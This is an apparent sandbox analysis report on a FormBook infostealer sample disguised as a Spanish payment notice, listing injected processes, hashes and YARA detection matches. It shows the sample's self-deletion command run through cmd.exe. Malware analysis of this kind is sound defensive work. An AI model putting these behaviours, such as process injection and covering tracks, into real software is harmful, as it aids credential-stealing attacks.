                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.383574580.0000000001440000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.306288871.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000000.305178001.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            General

                                            Target ID:11
                                            Start time:16:45:22
                                            Start date:13/05/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0x7ff6b8cf0000
                                            File size:3933184 bytes
                                            MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.366275281.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000000.349080967.0000000007136000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            General

                                            Target ID:14
                                            Start time:16:45:52
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\WWAHost.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\WWAHost.exe
                                            Imagebase:0x1120000
                                            File size:829856 bytes
                                            MD5 hash:370C260333EB3149EF4E49C8F64652A0
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.537261435.0000000003680000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.524275171.0000000000A60000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.529657171.0000000000FA0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:moderate

                                            General

                                            Target ID:15
                                            Start time:16:45:57
                                            Start date:13/05/2022
                                            Path:C:\Windows\SysWOW64\cmd.exe
                                            Wow64 process (32bit):true
                                            Commandline:/c del "C:\Users\user\Desktop\Notificaci#U00f3n de pago.exe"
                                            Imagebase:0xc20000
                                            File size:232960 bytes
                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            General

                                            Target ID:16
                                            Start time:16:45:58
                                            Start date:13/05/2022
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff7c9170000
                                            File size:625664 bytes
                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Disassembly

                                            No disassembly